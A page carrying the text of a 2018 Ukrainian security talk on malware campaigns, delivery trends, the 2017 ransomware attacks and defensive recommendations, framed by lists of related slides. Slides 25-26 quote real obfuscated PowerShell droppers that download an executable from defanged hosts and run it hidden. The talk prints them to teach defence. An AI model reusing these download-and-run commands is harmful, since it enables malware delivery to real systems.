Історії з практики. Боротьба із malware.
Історії з практики. Боротьба із malware. Історії з практики. Боротьба із malware.
Історії з практики. Боротьба із malware. Vladyslav Radetsky
 
Правила поведінки при роботі з ІТ 2017
Правила поведінки при роботі з ІТ 2017Правила поведінки при роботі з ІТ 2017
Правила поведінки при роботі з ІТ 2017Vladyslav Radetsky
 
Palo Alto Traps - тестирование на реальных семплах
Palo Alto Traps - тестирование на реальных семплахPalo Alto Traps - тестирование на реальных семплах
Palo Alto Traps - тестирование на реальных семплахVladyslav Radetsky
 
Сучасні цільові атаки
Сучасні цільові атакиСучасні цільові атаки
Сучасні цільові атакиVladyslav Radetsky
 
Атаки на критичну інфраструктуру України. Висновки. Рекомендації.
Атаки на критичну інфраструктуру України. Висновки. Рекомендації.Атаки на критичну інфраструктуру України. Висновки. Рекомендації.
Атаки на критичну інфраструктуру України. Висновки. Рекомендації.Vladyslav Radetsky
 
DLP 9.4 - новые возможности защиты от утечек
DLP 9.4 - новые возможности защиты от утечекDLP 9.4 - новые возможности защиты от утечек
DLP 9.4 - новые возможности защиты от утечекVladyslav Radetsky
 
Защита данных безнеса с помощью шифрования
Защита данных безнеса с помощью шифрованияЗащита данных безнеса с помощью шифрования
Защита данных безнеса с помощью шифрованияVladyslav Radetsky
 
Intel Security Endpoint Protection 2015
Intel Security Endpoint Protection 2015Intel Security Endpoint Protection 2015
Intel Security Endpoint Protection 2015Vladyslav Radetsky
 
ShadyRAT: Anatomy of targeted attack
ShadyRAT: Anatomy of targeted attackShadyRAT: Anatomy of targeted attack
ShadyRAT: Anatomy of targeted attackVladyslav Radetsky
 
7 кроків у напрямку безпеки
7 кроків у напрямку безпеки7 кроків у напрямку безпеки
7 кроків у напрямку безпекиVladyslav Radetsky
 

Mais de Vladyslav Radetsky (17)

2й фактор для телефону
2й фактор для телефону2й фактор для телефону
2й фактор для телефону
 
Безпека телефонів для ЗСУ, ТРО та волонтерів
Безпека телефонів для ЗСУ, ТРО та волонтерівБезпека телефонів для ЗСУ, ТРО та волонтерів
Безпека телефонів для ЗСУ, ТРО та волонтерів
 
Cybersecurity during real WAR [English version]
Cybersecurity during real WAR [English version]Cybersecurity during real WAR [English version]
Cybersecurity during real WAR [English version]
 
Basic detection tests of McAfee ENS + MVISION Insights usage for SunBurst threat
Basic detection tests of McAfee ENS + MVISION Insights usage for SunBurst threatBasic detection tests of McAfee ENS + MVISION Insights usage for SunBurst threat
Basic detection tests of McAfee ENS + MVISION Insights usage for SunBurst threat
 
Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.
Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.
Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.
 
Типові помилки при впровадженні DLP #2
Типові помилки при впровадженні DLP #2Типові помилки при впровадженні DLP #2
Типові помилки при впровадженні DLP #2
 
Історії з практики. Боротьба із malware.
Історії з практики. Боротьба із malware. Історії з практики. Боротьба із malware.
Історії з практики. Боротьба із malware.
 
Правила поведінки при роботі з ІТ 2017
Правила поведінки при роботі з ІТ 2017Правила поведінки при роботі з ІТ 2017
Правила поведінки при роботі з ІТ 2017
 
Palo Alto Traps - тестирование на реальных семплах
Palo Alto Traps - тестирование на реальных семплахPalo Alto Traps - тестирование на реальных семплах
Palo Alto Traps - тестирование на реальных семплах
 
Сучасні цільові атаки
Сучасні цільові атакиСучасні цільові атаки
Сучасні цільові атаки
 
McAfee Endpoint Security 10.1
McAfee Endpoint Security 10.1McAfee Endpoint Security 10.1
McAfee Endpoint Security 10.1
 
Атаки на критичну інфраструктуру України. Висновки. Рекомендації.
Атаки на критичну інфраструктуру України. Висновки. Рекомендації.Атаки на критичну інфраструктуру України. Висновки. Рекомендації.
Атаки на критичну інфраструктуру України. Висновки. Рекомендації.
 
DLP 9.4 - новые возможности защиты от утечек
DLP 9.4 - новые возможности защиты от утечекDLP 9.4 - новые возможности защиты от утечек
DLP 9.4 - новые возможности защиты от утечек
 
Защита данных безнеса с помощью шифрования
Защита данных безнеса с помощью шифрованияЗащита данных безнеса с помощью шифрования
Защита данных безнеса с помощью шифрования
 
Intel Security Endpoint Protection 2015
Intel Security Endpoint Protection 2015Intel Security Endpoint Protection 2015
Intel Security Endpoint Protection 2015
 
ShadyRAT: Anatomy of targeted attack
ShadyRAT: Anatomy of targeted attackShadyRAT: Anatomy of targeted attack
ShadyRAT: Anatomy of targeted attack
 
7 кроків у напрямку безпеки
7 кроків у напрямку безпеки7 кроків у напрямку безпеки
7 кроків у напрямку безпеки
 

Último

"How Preply reduced ML model development time from 1 month to 1 day",Yevhen Y...
"How Preply reduced ML model development time from 1 month to 1 day",Yevhen Y..."How Preply reduced ML model development time from 1 month to 1 day",Yevhen Y...
"How Preply reduced ML model development time from 1 month to 1 day",Yevhen Y...Fwdays
 
"Rethinking the existing data loading and processing process as an ETL exampl...
"Rethinking the existing data loading and processing process as an ETL exampl..."Rethinking the existing data loading and processing process as an ETL exampl...
"Rethinking the existing data loading and processing process as an ETL exampl...Fwdays
 
"What is a RAG system and how to build it",Dmytro Spodarets
"What is a RAG system and how to build it",Dmytro Spodarets"What is a RAG system and how to build it",Dmytro Spodarets
"What is a RAG system and how to build it",Dmytro SpodaretsFwdays
 
"GenAI Apps: Our Journey from Ideas to Production Excellence",Danil Topchii
"GenAI Apps: Our Journey from Ideas to Production Excellence",Danil Topchii"GenAI Apps: Our Journey from Ideas to Production Excellence",Danil Topchii
"GenAI Apps: Our Journey from Ideas to Production Excellence",Danil TopchiiFwdays
 
"Distributed graphs and microservices in Prom.ua", Maksym Kindritskyi
"Distributed graphs and microservices in Prom.ua", Maksym Kindritskyi"Distributed graphs and microservices in Prom.ua", Maksym Kindritskyi
"Distributed graphs and microservices in Prom.ua", Maksym KindritskyiFwdays
 
Тестування Blockchain - Що там можна тестувати?
Тестування Blockchain - Що там можна тестувати?Тестування Blockchain - Що там можна тестувати?
Тестування Blockchain - Що там можна тестувати?Oleksandr Romanov
 

Último (6)

"How Preply reduced ML model development time from 1 month to 1 day",Yevhen Y...
"How Preply reduced ML model development time from 1 month to 1 day",Yevhen Y..."How Preply reduced ML model development time from 1 month to 1 day",Yevhen Y...
"How Preply reduced ML model development time from 1 month to 1 day",Yevhen Y...
 
"Rethinking the existing data loading and processing process as an ETL exampl...
"Rethinking the existing data loading and processing process as an ETL exampl..."Rethinking the existing data loading and processing process as an ETL exampl...
"Rethinking the existing data loading and processing process as an ETL exampl...
 
"What is a RAG system and how to build it",Dmytro Spodarets
"What is a RAG system and how to build it",Dmytro Spodarets"What is a RAG system and how to build it",Dmytro Spodarets
"What is a RAG system and how to build it",Dmytro Spodarets
 
"GenAI Apps: Our Journey from Ideas to Production Excellence",Danil Topchii
"GenAI Apps: Our Journey from Ideas to Production Excellence",Danil Topchii"GenAI Apps: Our Journey from Ideas to Production Excellence",Danil Topchii
"GenAI Apps: Our Journey from Ideas to Production Excellence",Danil Topchii
 
"Distributed graphs and microservices in Prom.ua", Maksym Kindritskyi
"Distributed graphs and microservices in Prom.ua", Maksym Kindritskyi"Distributed graphs and microservices in Prom.ua", Maksym Kindritskyi
"Distributed graphs and microservices in Prom.ua", Maksym Kindritskyi
 
Тестування Blockchain - Що там можна тестувати?
Тестування Blockchain - Що там можна тестувати?Тестування Blockchain - Що там можна тестувати?
Тестування Blockchain - Що там можна тестувати?
 

Невивчені уроки або логи антивірусних війн

  • 1. Невивчені уроки або логи антивірусних війн 12 / 07 / 18 Владислав Радецький vr@optidata.com.ua
  • 2. #whoami Лінивий параноїк-зануда. Працюю у компанії OptiData Аналізую віруси. Пишу статті. Проводжу навчання з різних аспектів ІБ Допомагаю з проектуванням, впровадженням та супроводом засобів захисту Прийшов до вас щоб поділитися досвідом vr@optidata.com.ua radetskiy.wordpress.com
  • 3. OptiData – хто ми є ? Ми – це команда спеціалістів з практичним досвідом інтеграції та супроводу рішень з ІБ. Працюємо лише з тим, в чому розбираємось. Більшість здійснених нами проектів захищені NDA. Проектуємо. Навчаємо. Розгортаємо. Захищаємо.
  • 5. Важливо ! Усе про що я говоритиму – моя особиста точка зору Усе, що ви сьогодні почуєте може не співпадати із офіційною позицією компанії Усі події та персонажі є вигаданими, а будь-які співпадіння є випадковими Вибачте, етика, NDA etc…
  • 6. 04/18 020418 - Ursnif #doc_res #rtf #11882 030418 - quantloader #js #WSH 040418 - quantloader #URL #VBS 040418 - Dyreza #old_twitter_API 060418 - Lokibot #ace #scr | #ramnit #exe 110418 - HawkEye #doc_res #rtf #11882 250418 - netwireRAT #W97M/Downloader Поточна ситуація по атакам
  • 7. 05/18 030518 - Pony #doc17_0119 #HTA #power 100518 - Adwind #JAR #WSH 110518 - Lokibot #11882 #rtf 150518 - trojan #XLS #macro #powershell 250518 - Lokibot #zip #exe 250518 - FlawedAmmyy #power 300518 - Lokibot #doc_res #rtf #11882 300518 - Pony #rtf #11882 #gz #exe Поточна ситуація по атакам
  • 8. Поточна ситуація по атакам 06/18 040618 - DZ-WORM #W97M/Downloader 070618 - FlawedAmmyy (RAT) #iqy #powershell 140618 - LokiBot #packed #iso #exe 150618 - Grandcrab #WSH #powershell 150618 - Trickbot #W97M/Downloader #power 180618 - IE exploit 18-8174 #VBS #HTA #powershell 190618 - Adwind #JAR #WSH | #pony #gz #exe 200618 - Adwind #JAR #WSH | #pony #r11 #exe 210618 - HawkEye #11882 #rtf 220618 - pony #r11 #exe 260618 - fake_putty #upx 270618 - ransom #RSAUtil #decrypt 270618 - trojan #doc_res #rtf #11882
  • 9. Поточна ситуація по атакам 07/18 040718 - Trickbot #W97M/Downloader #powershell 050718 - HawkEye #xlam #powershell 100718 - Lokibot #rtf #11882 100718 - Lokibot #ACE #SCR 110718 - trojan #rar #exe … To be continued .
  • 10. Поточна ситуація по атакам 04/18 - 07/18 Всього – > 50 різних зразків MS Office – 17 розсилок з них: із застосуванням powershell – 7 розсилок із застосуванням 11882 – 8 розсилок Java Backdoor – 3 розсилки
  • 12. • Раніше: • %tmp%fixed_name.exe • WSH (vb*, js*) - 70% розсилок Що змінилося ? 1 Приманка 2 Payload
  • 13. • Тепер: • %Public%random_name.exe • %AppData%*random_name.exe • %ProgramData%random_name.exe • Powershell - 70% розсилок Що змінилося ? 1 Приманка 2 (Dropper) 3 Downl 4 Payload
  • 14. Що змінилося ? 1 Приманка 2 (Dropper) 3 Downl 4 Payload • Тепер: • АВ сигнатури із затримкою • Сигнатури генерують по 1му та 2му кроку • Спрацювання АВ – лише частина атаки • Крок 3 – перевірка параметрів системи
  • 15. • Раніше: • Розповсюдження – окремо, С2 - окремо • Приманки (80%) працювали лише добу Що змінилося ?
  • 16. • Тепер: • Розповсюдження та С2 у 80% - 1 хост • Приманки спрацьовують через 5-7 днів (!) Що змінилося ?
  • 17. • Раніше: • Payload – exe, не кодований • Web віддавали payload без зайвих умов Що змінилося ?
  • 18. • Тепер: • Payload – кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ?
  • 19. • Тепер: • Payload – кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ? 3 downloader 4 payload
  • 20. • Тепер: • Payload – кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ?
  • 21. • Раніше: • 1 точка • 1 та сама контрольна сума Що змінилося ?
  • 22. Що змінилося ? • Тепер: • Мімікрія • Зміна контрольних сум (Zbot, Dyreza, Trickbot)
  • 23. Powershell • Основний інструмент завантаження та запуску
  • 24. Powershell • Основний інструмент завантаження та запуску
  • 25. Powershell powershell $DuGgOVo = ‘yIqQkuk’;$a = ‘Msxml’ + ‘2.XML’ + ‘HTTP’;$avA3BE = ‘zjXOyL’;$b = ‘ADO’ + ‘DB.’ + ‘Stream’;$npo2cb = ‘AhLfy6’;$c = ‘G’ + ‘E’ + ‘T’;$xcVNsaFw = ‘tagBFRbq’;$d = 1 – 1 + 1;$nSQR1qd = ‘RhEGM’;$hr = New-Object - ComObject $a;$Tvcnch = ‘M7cerebf’;$ab = New-Object -ComObject $b;$oVDBm = ‘Y8DEr’;$path = $env:temp + ‘49552.exe’;$YlhPo = ‘zrEVSXdB’;$hr.open($c, ‘h11p:vivedoc{.} rudocument/pax.exe’, 0);$sHDPTRb5M = ‘TgRmj’;$hr.send();$MNhOwnbr = ‘xDJX0Z’;$ccUAdL = ‘JSsQEZQ’;$VR5pnoi = ‘piD7G6t’;$IY8gzg = ‘dZdYx’;$ab.open();$YODMbnR = ‘iIGrd’;$ab.type = $d;$ftUZAT = ‘uQk6v’;$ab.write($hr.responseBody);$MLKVm7Ki = ‘fQWbtv’;$ab.savetofile($path);$HyAX0Mlr = ‘tkvJU’;$ab.close();$NDnZ4YB = ‘NenMcXs’;$ayhTTR = ‘vtBgFL’;$bSBCCnkkL = ‘QaBQu’;$mLvCd5wn = ‘PkTPD’;$Wu3cZ0 = ‘nOP7DR’;$vJrAshn = ‘QvXmKwv’;$KfNmqt = ‘f9cKH3rw’;Start- Process $path;
  • 26. Powershell 1st run cmd /c powershell "'powershell ""function ysga([string] $bmecmdmov){(new-object system.net.webclient).downloadfile($bmecmdmov,''%tmp%xpvsvgw.exe'');start-process ''%tmp%xpvsvgw.exe'';}try{ysga(''h11p:icoindna{.}io/bri.ri'')}catch{ysga(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%dduuyd.bat; start-process '%tmp%dduuyd.bat' - windowstyle hidden" 2nd run cmd /c powershell "'powershell ""function bxode([string] $wxhfe){(new-object system.net.webclient).downloadfile($wxhfe,''%tmp%nsxr.exe'');start-process ''%tmp%nsxr.exe'';}try{bxode(''h11p:icoindna{.} io/bri.ri'')}catch{bxode(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%ktph.bat; start-process '%tmp%ktph.bat' - windowstyle hidden" 3rd run cmd /c powershell "'powershell ""function nnpsd([string] $knhvd){(new-object system.net.webclient).downloadfile($knhvd,''%tmp%bixi.exe'');start-process ''%tmp%bixi.exe'';}try{nnpsd(''h11p:icoindna{.} io/bri.ri'')}catch{nnpsd(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%wjqw.bat; start-process '%tmp%wjqw.bat' - windowstyle hidden"
  • 28. • Може комбінуватися з документами BITS
  • 29. • Може комбінуватися з документами BITS
  • 34. > Держ. архів Київської області Розповсюдження із скомпрометованих систем
  • 35. > radetskiy.wordpress.com Розповсюдження із скомпрометованих систем
  • 36. > radetskiy.wordpress.com Розповсюдження із скомпрометованих систем
  • 41. • Фільтр приєднань на рівні web/email - по заголовкам • Фільтр на рівні Web proxy - по User Agent - як на завантаження payload так і на зв’язок із С2 - • Пустий, test, bits, Mozilla 4.x etc – блок • В ідеалі – дозвіл лише актуальним IE, FF, Chrome • Аналіз SSL, заборона завантаження .ехе Перерізати канали доставки
  • 42. • Фільтр по джерелу (web/email) .ua, .gov.ua etc – не довірені по замовчуванню • Взагалі, що стосується web трафіку – усе, що не довірене і не потрібне для роботи блок Перерізати канали доставки
  • 43. • Execution Policy Bypass • Hidden PowerShell • PowerShell – WMI Script • PowerShell – Download • PowerShell – Encoded Command Powershell – контроль та блок
  • 44. • Блок вихідного трафіку • Заборона запуску cmd, powershell, mshta (4User) • Заборона перехресного виклику • Заборона дочірніх процесів для MS Office • Заборона запису та зчитування небезпечних типів CMD, MSHTA, MS Office
  • 49. • Зміст образів тестових ВМ • Адекватний час аналізу • Перевірка на інших збірках ОС та Office • Перевірка вручну • Перевірка на залізі Sandboxing
  • 50. • Ізоляція на мережевому рівні • Затримка, оновлення в ручному режимі • Тестування оновлень Вимушене використання ПЗ (MEDoc та інші)
  • 55. • Привілеї Адміністратора – не обов'язкові • Powershell, office, mshta • Повторне використання приманок • Зміна контрольних сум • Затримки при виконанні Поведінка при зараженні
  • 56. • Для простих користувачів – пам'ятка на А4 • Для IT/IS – чітка послідовність процедур • Автономно без очікування команди зверху • Ізолювати, зібрати дані, перевстановити… Реагування на інциденти
  • 64. Україна. Кібератаки 2017го року WannaCry 12-15 травень +C2, Mimikatz, SMB, +service, -MBR, -MFT, -signed, $300 - $600
  • 65. Україна. Кібератаки 2017го року xData 17-18 травень -C2, Mimikatz, SMB, -MBR, -MFT, -signed, $100 - $600
  • 66. Україна. Кібератаки 2017го року PetyaA 27 червень -C2, Mimikatz, SMB, +service, +MBR, +MFT, +signed, $300
  • 67. Україна. Кібератаки 2017го року BadRabbit 24 жовтень -C2, Mimikatz, SMB, +service, +MBR, +MFT, +signed, $300
  • 69. Україна. Кібератаки 2017го року WannaCry xData PetyaA BadRabbit травень травень червень жовтень
  • 70. MS17-010 – був опублікований 14 / 03 / 17 Mimikatz – був опублікований десь у 2011 Зауважте:
  • 71. • Не достатньо просто знати про вразливість • Не достатньо розуміти як саме працює вразливість • Не достатньо поставити виправлення і заспокоїтись Що нам це дає?
  • 72. Що змінилося для нас? Україна. Кібератаки 2017го року
  • 73. • Частина змирилася і дбає лише про бекапи • Інша частина колекціонує IOC • 15-20% - почали змінювати захист Україна. Кібератаки 2017го року
  • 74. Хто з вас проводить розслідування по детекту ? * по кожному спрацюванню систем захисту А звідки ви впевнені що АВ не впіймав лише хвіст ? Реагування на інциденти
  • 75. Три історії з практики
  • 78. Історія #1 “Макрос” - 14.03.18 • Хтось відкриває документ 2013го року • Спрацьовує макрос – пандемія (файли .doc) • Розслідування, розстріли • За 5 годин усі документи на х00 системах інжектовано • А якби це був #Pony або Ransom ? • …
  • 83. Історія #2 “Впертий ransomware” • Жертва отримує фішинг із приманкою • Запускається ransomware • “Ааааа, ваш антивірус пропустив…” • Надаю людині маркери + контрзаходи • Рекурсія, рекурсія, (сумно, боляче) • Зашифровано систему керівника • “То шо ви там казали, який параметр поставити?”
  • 84. Історія #3 “Страх або як роблять новини про ІБ”
  • 85. Історія #3 “Страх або як роблять новини про ІБ”
  • 86. Історія #3 “Страх або як роблять новини про ІБ” • Хтось “качає” щось .. ок, це був фейковий AdobeFlash • Зараження, виведення АРМ з ладу • Чутки поширюються зі швидкістю світла • В одному міністерстві вирішують вимкнути сервери • Журналіст намагається зайти на сайт міністерства • 502 = “Ааааа! Хакери поламали міністерство”
  • 88. Висновки #1 • Інструкції на випадок атаки • Автономне прийняття рішень та контрзаходів • Службові розслідування, форензика • Мінімізація втрат • Навчання персоналу
  • 89. Висновки #2 • Оновлення/виправлення MS Office та Windows ! ! ! • Блок створення / запуску C:Users***.exe • Контроль/блок WSH, PowerShell, HTA, CMD, MS Office • Посилена фільтрація Web та Email • Відмова від RTF, макросів, JRE, Flash
  • 90. Запитання ? #IOC та звіти шукайте тут: radetskiy.wordpress.com
  • 91. • Twitter • https://twitter.com/malwrhunterteam • https://twitter.com/James_inthe_box • https://twitter.com/DissectMalware • https://twitter.com/Techhelplistcom • https://twitter.com/malware_traffic • Blogs & Media • https://embedi.com/blog/ • https://www.wired.com/category/threatlevel/ • https://arstechnica.com/information-technology/2018/ • https://threatpost.com/ • https://security.googleblog.com/ • https://www.schneier.com/ • https://krebsonsecurity.com/ • https://www.troyhunt.com/ Джерела інформації:
  • 92. • VirtualBox • SysInternals Suite, PSTools • Nirsoft tools • oletools (python) • Wireshark, Fiddler • Pestudio, Explorer Suite, PE Explorer Інструменти:
  • 93. Дякую вам за увагу!